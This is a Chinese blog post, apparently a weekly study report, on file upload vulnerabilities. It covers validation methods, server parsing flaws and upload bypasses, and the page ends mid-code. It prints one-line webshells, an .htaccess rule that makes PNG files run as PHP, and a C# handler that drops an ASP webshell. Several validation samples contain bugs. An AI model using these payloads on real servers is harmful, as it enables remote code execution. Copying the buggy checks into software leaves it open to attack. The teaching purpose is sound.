<!DOCTYPE html>



  


<html class="theme-next muse use-motion" lang="zh-Hans">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">

<script>
    (function(){
        if(''){
            if (prompt('请输入文章密码') !== ''){
                alert('密码错误！');
                history.back();
            }
        }
    })();
</script>








<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />




  
  
  
  

  
    
    
  

  

  

  

  

  
    
    
    <link href="https://fonts.cat.net/css?family=PT Mono:300,300italic,400,400italic,700,700italic&subset=latin,latin-ext" rel="stylesheet" type="text/css">
  






<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="Hexo, NexT" />










<meta name="description" content="任务标题：WEB安全之上传漏洞1、编写一个上传图片的功能页面 2、针对上传的文件进行验证（后缀验证、文件头验证、文件名验证等） 3、文件上传通常会与文件解析漏洞相结合，可以收集整理存在解析漏洞的组件和相关版本，无法部署相关环境，可以学习相关技术，不用实际操作">
<meta property="og:type" content="article">
<meta property="og:title" content="第十四周：文件上传漏洞">
<meta property="og:url" content="http://yoursite.com/2021/01/14/%E7%AC%AC%E5%8D%81%E5%9B%9B%E5%91%A8%EF%BC%9A%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E/index.html">
<meta property="og:site_name" content="Bu1&#39;Blog">
<meta property="og:description" content="任务标题：WEB安全之上传漏洞1、编写一个上传图片的功能页面 2、针对上传的文件进行验证（后缀验证、文件头验证、文件名验证等） 3、文件上传通常会与文件解析漏洞相结合，可以收集整理存在解析漏洞的组件和相关版本，无法部署相关环境，可以学习相关技术，不用实际操作">
<meta property="og:locale">
<meta property="article:published_time" content="2021-01-14T09:15:38.000Z">
<meta property="article:modified_time" content="2021-01-14T09:17:31.413Z">
<meta property="article:author" content="Bu1">
<meta name="twitter:card" content="summary">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '',
    scheme: 'Muse',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://yoursite.com/2021/01/14/第十四周：文件上传漏洞/"/>





  <title>第十四周：文件上传漏洞 | Bu1'Blog</title>
  








<meta name="generator" content="Hexo 5.4.0"></head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Bu1'Blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">如果能控制粗鄙的狂喜，就不会有深入骨髓的悲伤。</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/%20" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/%20" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/%20" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br />
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about/%20" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br />
            
            关于
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2021/01/14/%E7%AC%AC%E5%8D%81%E5%9B%9B%E5%91%A8%EF%BC%9A%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.png">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Bu1'Blog">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">第十四周：文件上传漏洞</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2021-01-14T17:15:38+08:00">
                2021-01-14
              </time>
            

            

            
          </span>

          
            <span class="post-category" >
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/%E4%BF%A1%E5%AE%89%E4%B9%8B%E8%B7%AF/" itemprop="url" rel="index">
                    <span itemprop="name">信安之路</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
              <span class="post-comments-count">
                <span class="post-meta-divider">|</span>
                <span class="post-meta-item-icon">
                  <i class="fa fa-comment-o"></i>
                </span>
                <a href="/2021/01/14/%E7%AC%AC%E5%8D%81%E5%9B%9B%E5%91%A8%EF%BC%9A%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E/#comments" itemprop="discussionUrl">
                  <span class="post-comments-count disqus-comment-count"
                        data-disqus-identifier="2021/01/14/第十四周：文件上传漏洞/" itemprop="commentCount"></span>
                </a>
              </span>
            
          

          
          

          

          
            <div class="post-wordcount">
              
                
                <span class="post-meta-item-icon">
                  <i class="fa fa-file-word-o"></i>
                </span>
                
                  <span class="post-meta-item-text">字数统计&#58;</span>
                
                <span title="字数统计">
                  2.4k 字
                </span>
              

              
                <span class="post-meta-divider">|</span>
              

              
                <span class="post-meta-item-icon">
                  <i class="fa fa-clock-o"></i>
                </span>
                
                  <span class="post-meta-item-text">阅读时长 &asymp;</span>
                
                <span title="阅读时长">
                  10 分钟
                </span>
              
            </div>
          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h1 id="任务标题：WEB安全之上传漏洞"><a href="#任务标题：WEB安全之上传漏洞" class="headerlink" title="任务标题：WEB安全之上传漏洞"></a>任务标题：WEB安全之上传漏洞</h1><p>1、编写一个上传图片的功能页面</p>
<p>2、针对上传的文件进行验证（后缀验证、文件头验证、文件名验证等）</p>
<p>3、文件上传通常会与文件解析漏洞相结合，可以收集整理存在解析漏洞的组件和相关版本，无法部署相关环境，可以学习相关技术，不用实际操作</p>
<span id="more"></span>

<p>扩展学习：学习如何绕过黑名单验证、文件头验证，如何杜绝上传图片的功能无法利用获取 shell ？</p>
<h1 id="学习报告"><a href="#学习报告" class="headerlink" title="学习报告"></a>学习报告</h1><h2 id="0x01-文件上传简介"><a href="#0x01-文件上传简介" class="headerlink" title="0x01 文件上传简介"></a>0x01 文件上传简介</h2><p>文件上传从字面意思很容易理解，就是指上传文件功能，但是当攻击者上传恶意文件时，如上传木马、病毒、恶意脚本、shell等就可能造成文件上传功能。关键在于我们在编写上传程序时是否有对用户上传的文件进行过滤，如果攻击者上传的恶意文件被服务器解析则会造成很大的危害。</p>
<p>文件上传常见的报文特点：</p>
<ol>
<li>multipart/form-data ：form表单的enctype属性，规定为二进制数据</li>
<li>boundary字符串： 作为分隔符用来区分POST数据</li>
<li>name：input表单名</li>
<li>Content-Type：定义文件的类型和网页的编码，决定浏览器将以什么形式、什么编码读取这个文件</li>
</ol>
<h2 id="0x02-常用验证方法"><a href="#0x02-常用验证方法" class="headerlink" title="0x02 常用验证方法"></a>0x02 常用验证方法</h2><h3 id="1-后缀验证"><a href="#1-后缀验证" class="headerlink" title="1. 后缀验证"></a>1. 后缀验证</h3><figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">html</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">head</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;<span class="name">title</span>&gt;</span>后缀验证<span class="tag">&lt;/<span class="name">title</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;<span class="name">script</span> <span class="attr">type</span>=<span class="string">&quot;text.javascript&quot;</span>&gt;</span><span class="javascript"></span></span><br><span class="line"><span class="javascript">  		funtion <span class="function"><span class="title">checkFile</span>(<span class="params"></span>)</span>&#123;</span></span><br><span class="line"><span class="javascript">  			<span class="keyword">var</span> flag=<span class="literal">false</span>;</span></span><br><span class="line"><span class="javascript">  			<span class="keyword">var</span> str=<span class="built_in">document</span>.getElementById(<span class="string">&quot;file&quot;</span>).value;</span></span><br><span class="line"><span class="javascript">  			str=str.substring(str.lastIndexOf(<span class="string">&#x27;.&#x27;</span>)+<span class="number">1</span>);</span></span><br><span class="line"><span class="javascript">  			<span class="keyword">var</span> arr=<span class="keyword">new</span> <span class="built_in">Array</span>(<span class="string">&#x27;png&#x27;</span>,<span class="string">&#x27;bmp&#x27;</span>,<span class="string">&#x27;gif&#x27;</span>,<span class="string">&#x27;jpg&#x27;</span>); </span></span><br><span class="line"><span class="javascript">  			<span class="keyword">for</span>(<span class="keyword">var</span> i=<span class="number">0</span>;i&lt;arr.length;i++)&#123;</span></span><br><span class="line"><span class="javascript">  				<span class="keyword">if</span>(str=arr[i])&#123;</span></span><br><span class="line"><span class="javascript">  					flag=<span class="literal">true</span>;</span></span><br><span class="line"><span class="javascript">  				&#125;</span></span><br><span class="line"><span class="javascript">  			&#125;</span></span><br><span class="line"><span class="javascript">  			<span class="keyword">if</span>(!flag)</span></span><br><span class="line"><span class="javascript">  				alert(<span class="string">&#x27;file invalid&#x27;</span>);</span></span><br><span class="line"><span class="javascript">  			&#125;</span></span><br><span class="line"><span class="javascript">  			<span class="keyword">return</span> flag;</span></span><br><span class="line"><span class="javascript">  		&#125;</span></span><br><span class="line"><span class="javascript">  </span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;/<span class="name">head</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;<span class="name">body</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">form</span> <span class="attr">action</span>=<span class="string">&quot;upload.php&quot;</span> <span class="attr">method</span>=<span class="string">&quot;post&quot;</span> <span class="attr">onsubmit</span>=<span class="string">“</span> <span class="attr">checkFile</span> ”</span></span><br><span class="line"><span class="tag">          <span class="attr">enctype</span>=<span class="string">&quot;multpart/form-data&quot;</span>&gt;</span></span><br><span class="line">      		<span class="tag">&lt;<span class="name">input</span> <span class="attr">type</span>=<span class="string">&quot;file&quot;</span> <span class="attr">name</span>=<span class="string">&quot;file&quot;</span> <span class="attr">id</span>=<span class="string">&quot;file&quot;</span> /&gt;</span><span class="tag">&lt;<span class="name">br</span>/&gt;</span></span><br><span class="line">     			<span class="tag">&lt;<span class="name">input</span> <span class="attr">type</span>=<span class="string">&quot;submit&quot;</span> <span class="attr">value</span>=<span class="string">&quot;Submit&quot;</span> <span class="attr">name</span>=<span class="string">&quot;submit&quot;</span> /&gt;</span>     </span><br><span class="line">    <span class="tag">&lt;/<span class="name">form</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;/<span class="name">body</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">html</span>&gt;</span></span><br></pre></td></tr></table></figure>

<p>通过编写js脚本可以对用户上传的文件进行后缀限制。从代码来看，只允许png、bmp、gif、jpg结尾的文件进行上传。但是现在这种方法一般不再使用，因为攻击可以通过前端禁用JS的方式直接绕过限制。</p>
<h3 id="2-MIME验证"><a href="#2-MIME验证" class="headerlink" title="2. MIME验证"></a>2. MIME验证</h3><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span>(<span class="variable">$_FILES</span>[<span class="string">&#x27;file&#x27;</span>][<span class="string">&#x27;type&#x27;</span>]==<span class="string">&quot; image/jpeg&quot;</span>)&#123;</span><br><span class="line">	<span class="variable">$imageTempName</span>=<span class="variable">$_FILES</span>[<span class="string">&#x27;file&#x27;</span>][<span class="string">&#x27;tmp_name&#x27;</span>];</span><br><span class="line">	<span class="variable">$imageName</span>=<span class="variable">$_FILES</span>[<span class="string">&#x27;file&#x27;</span>][<span class="string">&#x27;name&#x27;</span>];</span><br><span class="line">	<span class="variable">$last</span>=substr(<span class="variable">$imageName</span>, strrpos(<span class="variable">$imageName</span>,<span class="string">&quot;.&quot;</span>));</span><br><span class="line">	<span class="keyword">if</span>(!is_dir(<span class="string">&quot;uploadFile&quot;</span>))&#123;</span><br><span class="line">		mkdir(<span class="string">&quot;uploadFile&quot;</span>);</span><br><span class="line">	&#125;</span><br><span class="line">	<span class="variable">$imageName</span>=md5(<span class="variable">$imageName</span>).<span class="variable">$last</span>;</span><br><span class="line">	move_uploaded_file(<span class="variable">$imageName</span>, <span class="string">&quot;./uploadFile/&quot;</span>.<span class="variable">$imageName</span>;</span><br><span class="line">	<span class="keyword">echo</span>(<span class="string">&quot;Success&quot;</span>);</span><br><span class="line">&#125;<span class="keyword">else</span>&#123;</span><br><span class="line">	<span class="keyword">echo</span>(<span class="string">&quot;Fail&quot;</span>);</span><br><span class="line">	<span class="keyword">exit</span>();</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>MIME验证一般是在后端进行，MIME只的是文件类型，在上传数据的时候一般会在Content-Type中注明所上传的文件是什么类型，所以可以通过MIME对所上传的文件类型进行判断。</p>
<h3 id="3-拓展名验证"><a href="#3-拓展名验证" class="headerlink" title="3. 拓展名验证"></a>3. 拓展名验证</h3><ul>
<li><p>白名单</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">	<span class="variable">$Whitelist</span> = <span class="keyword">array</span>(<span class="string">&#x27;jpg&#x27;</span>,<span class="string">&#x27;jpge&#x27;</span>,<span class="string">&#x27;bmp&#x27;</span>,<span class="string">&#x27;gif&#x27;</span>,<span class="string">&#x27;png&#x27;</span>);<span class="comment">#白名单允许函数</span></span><br><span class="line">	<span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">&quot;submit&quot;</span>]))&#123;</span><br><span class="line">		<span class="variable">$name</span> = <span class="variable">$_FILES</span>[<span class="string">&#x27;file&#x27;</span>][<span class="string">&#x27;name&#x27;</span>];</span><br><span class="line">		<span class="variable">$extension</span> = substr(strrchr(<span class="variable">$name</span>, <span class="string">&quot;.&quot;</span>), <span class="number">1</span>);</span><br><span class="line">		<span class="variable">$boo</span> = <span class="literal">true</span>;</span><br><span class="line">		<span class="keyword">foreach</span>(<span class="variable">$Blacklist</span> <span class="keyword">as</span> <span class="variable">$key</span> =&gt; <span class="variable">$value</span>) &#123;</span><br><span class="line">			<span class="keyword">if</span> (<span class="variable">$value</span>==<span class="variable">$extension</span>)&#123;</span><br><span class="line">				<span class="variable">$boo</span> = <span class="literal">false</span>;</span><br><span class="line">				<span class="keyword">break</span>;</span><br><span class="line">			&#125;</span><br><span class="line">		&#125;</span><br><span class="line">		<span class="keyword">if</span>(!<span class="variable">$boo</span>)&#123;</span><br><span class="line">			<span class="keyword">echo</span> <span class="string">&quot;file invalid&quot;</span>;</span><br><span class="line">		&#125;</span><br><span class="line">	&#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>白名单验证只允许上传已经定义过的拓展名，但是从目前的攻击手段来看也并不是完全安全的，如我们可以利用00截断绕过拓展名限定。</p>
</li>
<li><p>黑名单</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">	<span class="variable">$Blacklist</span> = <span class="keyword">array</span>(<span class="string">&#x27;asp&#x27;</span>,<span class="string">&#x27;php&#x27;</span>,<span class="string">&#x27;jsp&#x27;</span>,<span class="string">&#x27;php5&#x27;</span>,<span class="string">&#x27;asa&#x27;</span>,<span class="string">&#x27;aspx&#x27;</span>);<span class="comment">#危险函数黑名单</span></span><br><span class="line">	<span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">&quot;submit&quot;</span>]))&#123;</span><br><span class="line">		<span class="variable">$name</span> = <span class="variable">$_FILES</span>[<span class="string">&#x27;file&#x27;</span>][<span class="string">&#x27;name&#x27;</span>];</span><br><span class="line">		<span class="variable">$extension</span> = substr(strrchr(<span class="variable">$name</span>, <span class="string">&quot;.&quot;</span>), <span class="number">1</span>);</span><br><span class="line">		<span class="variable">$boo</span> = <span class="literal">false</span>;</span><br><span class="line">		<span class="keyword">foreach</span>(<span class="variable">$Blacklist</span> <span class="keyword">as</span> <span class="variable">$key</span> =&gt; <span class="variable">$value</span>) &#123;</span><br><span class="line">			<span class="keyword">if</span> (<span class="variable">$value</span>==<span class="variable">$extension</span>)&#123;</span><br><span class="line">				<span class="variable">$boo</span> = <span class="literal">true</span>;</span><br><span class="line">				<span class="keyword">break</span>;</span><br><span class="line">			&#125;</span><br><span class="line">		&#125;</span><br><span class="line">		<span class="keyword">if</span>(<span class="variable">$boo</span>)&#123;</span><br><span class="line">			<span class="keyword">echo</span> <span class="string">&quot;file invalid&quot;</span>;</span><br><span class="line">		&#125;</span><br><span class="line">	&#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>黑名单验证通过验证一系列不安全的拓展名来对上传的文件类型进行判断，过滤掉危险文件。这种方法也有一定局限性，因为在进行黑名单填充的时候可能会忽略掉一些危险拓展名，如大小写不同的pHP或者加数字php2等等。</p>
</li>
</ul>
<h3 id="4-文件头验证"><a href="#4-文件头验证" class="headerlink" title="4. 文件头验证"></a>4. 文件头验证</h3><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">static</span> &#123;</span><br><span class="line">        <span class="comment">//设立白名单</span></span><br><span class="line">        docMap = <span class="keyword">new</span> HashMap&lt;String,String&gt;();</span><br><span class="line">        docMap.put(<span class="string">&quot;89504E47&quot;</span>,<span class="string">&quot;png&quot;</span>);<span class="comment">//png</span></span><br><span class="line">        docMap.put(<span class="string">&quot;47494638&quot;</span>,<span class="string">&quot;gif&quot;</span>);<span class="comment">//gif</span></span><br><span class="line">        docMap.put(<span class="string">&quot;49492A00&quot;</span>,<span class="string">&quot;tif&quot;</span>);<span class="comment">//tif</span></span><br><span class="line">        docMap.put(<span class="string">&quot;D0CF11E0&quot;</span>,<span class="string">&quot;xls_or_doc&quot;</span>);<span class="comment">//xls_or_doc</span></span><br><span class="line">        docMap.put(<span class="string">&quot;25504446&quot;</span>,<span class="string">&quot;pdf&quot;</span>);<span class="comment">//pdf</span></span><br><span class="line">        docMap.put(<span class="string">&quot;52617221&quot;</span>,<span class="string">&quot;rar&quot;</span>);<span class="comment">//rar</span></span><br><span class="line">        docMap.put(<span class="string">&quot;504B0304&quot;</span>,<span class="string">&quot;zip&quot;</span>);<span class="comment">//zip</span></span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">public</span> <span class="keyword">static</span> String <span class="title">getFileType</span><span class="params">(InputStream is)</span></span>&#123;</span><br><span class="line">	String header = getFileHeader(is);</span><br><span class="line">	<span class="keyword">return</span> getFileTypeByHeader(header);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">public</span> <span class="keyword">static</span> String <span class="title">getFileTypeByHeader</span><span class="params">(String header)</span></span>&#123;</span><br><span class="line">	<span class="keyword">return</span> docMap.get(header);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>文件头验证时借助文件幻数进行判断文件的类型。从代码中看首先通过file获取到文件流inputstream，获取到文件流后截取文件流的前四个字节并将其转成16进制，将得到的16进制全部转换成大写后与常见的文件类型头部进行比对就可以知道这个文件的真正类型了。</p>
<table>
<thead>
<tr>
<th>文件类型</th>
<th>头部信息</th>
</tr>
</thead>
<tbody><tr>
<td>JPEG (jpg)</td>
<td>FFD8FF</td>
</tr>
<tr>
<td>PNG (png)</td>
<td>89504E47</td>
</tr>
<tr>
<td>GIF (gif)</td>
<td>47494638</td>
</tr>
<tr>
<td>TIFF</td>
<td>49492A00</td>
</tr>
<tr>
<td>pdf</td>
<td>25504446</td>
</tr>
<tr>
<td>rar</td>
<td>52617221</td>
</tr>
<tr>
<td>zip</td>
<td>504B0304</td>
</tr>
</tbody></table>
<h2 id="0x03-文件解析漏洞"><a href="#0x03-文件解析漏洞" class="headerlink" title="0x03 文件解析漏洞"></a>0x03 文件解析漏洞</h2><h3 id="1-IIS解析漏洞"><a href="#1-IIS解析漏洞" class="headerlink" title="1. IIS解析漏洞"></a>1. IIS解析漏洞</h3><p>在IIS6.0的情况下有三种可以利用的手段</p>
<ul>
<li>建立<code>*.asa</code>、<code>*.asp</code>格式的文件夹时其目录下的文件都会当做asp文件解析。</li>
<li>当文件名为<code>*.asp;1.jpg</code>时，IIS会以ASP文件来解析，也就是说;起到了截断作用。</li>
<li>WebDav漏洞，借助put方法直接向服务器上传危险脚本</li>
</ul>
<h3 id="2-Apache解析漏洞"><a href="#2-Apache解析漏洞" class="headerlink" title="2. Apache解析漏洞"></a>2. Apache解析漏洞</h3><p>在Apache 1.X与Apache 2.X中如果碰到文件名为<code>demo.php.test</code>的文件会按php文件进行解析，根据Apache的解析规则，如果碰到不认识的拓展名便会进行遍历，直到碰到能够解析的拓展名。</p>
<blockquote>
<p>在Apache根目录的coof/mime.types文件中有详细的可识别拓展名。</p>
</blockquote>
<h3 id="3-Nginx解析漏洞"><a href="#3-Nginx解析漏洞" class="headerlink" title="3. Nginx解析漏洞"></a>3. Nginx解析漏洞</h3><p>在Nginx的服务器环境下，假如成功上传一张名为test.jpg的文件到网站根目录下，如果我们访问<code>www.demo.com/test.jpg/test.php</code>这个虚构的目录服务器则会直接将1.jpg作为php文件进行解析。</p>
<h2 id="0x04-常见上传绕过方法"><a href="#0x04-常见上传绕过方法" class="headerlink" title="0x04 常见上传绕过方法"></a>0x04 常见上传绕过方法</h2><p>常用的一句话</p>
<blockquote>
<ol>
<li>Asp一句话：<code>&lt;%eval request(“bu1”)%&gt;</code></li>
<li>Php 一句话：<code>&lt;%php @eval($_POST[bu1]);?&gt;</code></li>
<li>Aspx一句话：<code>&lt;%@ Page Languag=”bu1”%&gt;&lt;%eval(Request.Item[“bu1”])%&gt;</code></li>
</ol>
</blockquote>
<h3 id="1-黑名单绕过"><a href="#1-黑名单绕过" class="headerlink" title="1. 黑名单绕过"></a>1. 黑名单绕过</h3><ul>
<li><p>文件拓展名绕过</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">Php除了可以解析php后缀 还可以解析php2，php3，php4 后缀</span><br><span class="line">Asp可解析 asa，cer,cdx</span><br><span class="line">Aspx可解析 ashx，asmx，ascx</span><br><span class="line">Jsp可解析jspx、jspf</span><br></pre></td></tr></table></figure></li>
<li><p>.htaccess文件绕过</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">重置解析名称，将png调成php解析，之后再将php后缀改为png上传。代码如下:</span><br><span class="line">&lt;FilesMatch &quot;.png&quot;&gt;  </span><br><span class="line">SetHandler application/x-httpd-php</span><br><span class="line">&lt;/FilesMatch&gt;</span><br></pre></td></tr></table></figure></li>
<li><p>ashx绕过</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line">cer,asa,cdx等等无法使用时候。编辑器允许上传ashx文件的或，上传这个脚本解析后就会生成一个test.asp的马，你就可以连接这个test.asp  密码为:put</span><br><span class="line">&lt;%@ WebHandler Language=&quot;C#&quot; Class=&quot;Handler&quot; %&gt;</span><br><span class="line">using System;</span><br><span class="line">using System.Web;</span><br><span class="line">using System.IO;</span><br><span class="line">public class Handler : IHttpHandler &#123;</span><br><span class="line"></span><br><span class="line">    public void ProcessRequest (HttpContext context) &#123;</span><br><span class="line">        context.Response.ContentType = &quot;text/plain&quot;;</span><br><span class="line"></span><br><span class="line">        //这里会在目录下生成一个test.asp的文件</span><br><span class="line">        StreamWriter file1= File.CreateText(context.Server.MapPath(&quot;test.asp&quot;));</span><br><span class="line">        //这里是写入一句话木马   密码是：ptu</span><br><span class="line">        file1.Write(&quot;&lt;%response.clear:execute request(&quot;put&quot;):response.End%&gt;&quot;);</span><br><span class="line">        file1.Flush();</span><br><span class="line">        file1.Close();       </span><br><span class="line">    &#125;</span><br><span class="line">    public bool IsReusable &#123;</span><br><span class="line">        get &#123;</span><br><span class="line">            return false;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span 